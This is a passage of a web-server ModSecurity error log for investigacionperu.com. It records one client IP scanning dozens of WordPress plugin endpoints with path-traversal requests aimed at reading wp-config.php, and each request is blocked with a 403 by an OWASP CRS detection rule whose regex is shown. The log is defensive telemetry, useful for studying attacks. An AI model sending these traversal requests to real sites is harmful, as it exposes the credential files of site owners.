[accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jquery-mega-menu/skin.php"] [unique_id "Y0ZxQaBKlkjFPqrcdjM3mwAAABM"] [Wed Oct 12 02:48:17.797934 2022] [:error] [pid 22337:tid 140534358148864] [client 185.189.115.30:49672] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/justified-image-grid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/justified-image-grid/download.php"] [unique_id "Y0ZxQaBKlkjFPqrcdjM3nAAAABQ"] [Wed Oct 12 02:48:17.949501 2022] [:error] [pid 22337:tid 140534467254016] [client 185.189.115.30:49674] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=..%2F..%2F..%2Fwp-config.php&action=asdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/livesig/livesig-ajax-backend.php"] [unique_id "Y0ZxQaBKlkjFPqrcdjM3nQAAAAc"] [Wed Oct 12 02:48:18.109829 2022] [:error] [pid 22337:tid 140534597625600] [client 185.189.115.30:49676] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/localize-my-post/ajax/include.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "Y0ZxQqBKlkjFPqrcdjM3ngAAAAA"] [Wed Oct 12 02:48:18.320141 2022] [:error] [pid 22337:tid 140534433683200] [client 185.189.115.30:49678] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-photo-gallery/macdownload.php"] [unique_id "Y0ZxQqBKlkjFPqrcdjM3nwAAAAs"] [Wed Oct 12 02:48:18.473462 2022] [:error] [pid 22337:tid 140534374934272] [client 185.189.115.30:49682] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "Y0ZxQqBKlkjFPqrcdjM3oAAAABI"] [Wed Oct 12 02:48:18.633685 2022] [:error] [pid 22338:tid 140534341363456] [client 185.189.115.30:49684] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mailz/lists/config/config.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mailz/lists/config/config.php"] [unique_id "Y0ZxQmINFIoIk7hPzpaZEwAAAFY"] [Wed Oct 12 02:48:18.784252 2022] [:error] [pid 22338:tid 140534366541568] [client 185.189.115.30:49686] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id "Y0ZxQmINFIoIk7hPzpaZFAAAAFM"] [Wed Oct 12 02:48:18.934982 2022] [:error] [pid 22339:tid 140534458861312] [client 185.189.115.30:49688] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"] [unique_id "Y0ZxQtmZws0mEkXxGo-VHwAAAIg"] [Wed Oct 12 02:48:19.085395 2022] [:error] [pid 22972:tid 140534349756160] [client 185.189.115.30:49690] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/myflash/myflash-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/myflash/myflash-button.php"] [unique_id "Y0ZxQ-LrJ0tgpRmNRAaHewAAANU"] [Wed Oct 12 02:48:19.288162 2022] [:error] [pid 22338:tid 140534416897792] [client 185.189.115.30:49692] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php"] [unique_id "Y0ZxQ2INFIoIk7hPzpaZFQAAAE0"] [Wed Oct 12 02:48:19.462109 2022] [:error] [pid 22338:tid 140534597625600] [client 185.189.115.30:49694] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/old-post-spinner/logview.php"] [unique_id "Y0ZxQ2INFIoIk7hPzpaZFgAAAEA"] [Wed Oct 12 02:48:19.627080 2022] [:error] [pid 22338:tid 140534442075904] [client 185.189.115.30:49696] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/page-flip-image-gallery/books/getConfig.php"] [unique_id "Y0ZxQ2INFIoIk7hPzpaZFwAAAEo"] [Wed Oct 12 02:48:19.778225 2022] [:error] [pid 22339:tid 140534589232896] [client 185.189.115.30:49698] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/photocart-link/decode.php?id=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/photocart-link/decode.php"] [unique_id "Y0ZxQ9mZws0mEkXxGo-VIAAAAIE"] [Wed Oct 12 02:48:19.954474 2022] [:error] [pid 22339:tid 140534383326976] [client 185.189.115.30:49700] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pica-photo-gallery/picadownload.php"] [unique_id "Y0ZxQ9mZws0mEkXxGo-VIQAAAJE"] [Wed Oct 12 02:48:20.105631 2022] [:error] [pid 22338:tid 140534572447488] [client 185.189.115.30:49702] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pictpress/resize.php?size=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pictpress/resize.php"] [unique_id "Y0ZxRGINFIoIk7hPzpaZGAAAAEM"] [Wed Oct 12 02:48:20.268132 2022] [:error] [pid 22338:tid 140534564054784] [client 185.189.115.30:49704] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "Y0ZxRGINFIoIk7hPzpaZGQAAAEQ"] [Wed Oct 12 02:48:20.427106 2022] [:error] [pid 22338:tid 140534391719680] [client 185.189.115.30:49706] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php"] [unique_id "Y0ZxRGINFIoIk7hPzpaZGgAAAFA"] [Wed Oct 12 02:48:20.577698 2022] [:error] [pid 22338:tid 140534458861312] [client 185.189.115.30:49708] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "Y0ZxRGINFIoIk7hPzpaZGwAAAEg"] [Wed Oct 12 02:48:20.728763 2022] [:error] [pid 22972:tid 140534458861312] [client 185.189.115.30:49710] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "Y0ZxROLrJ0tgpRmNRAaHfAAAAMg"] [Wed Oct 12 02:48:20.879790 2022] [:error] [pid 22338:tid 140534374934272] [client 185.189.115.30:49712] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/relocate-upload/relocate-upload.php"] [unique_id "Y0ZxRGINFIoIk7hPzpaZHAAAAFI"] [Wed Oct 12 02:48:21.030763 2022] [:error] [pid 22338:tid 140534580840192] [client 185.189.115.30:49714] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/robotcpa/f.php"] [unique_id "Y0ZxRWINFIoIk7hPzpaZHQAAAEI"] [Wed Oct 12 02:48:21.182686 2022] [:error] [pid 22972:tid 140534597625600] [client 185.189.115.30:49716] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 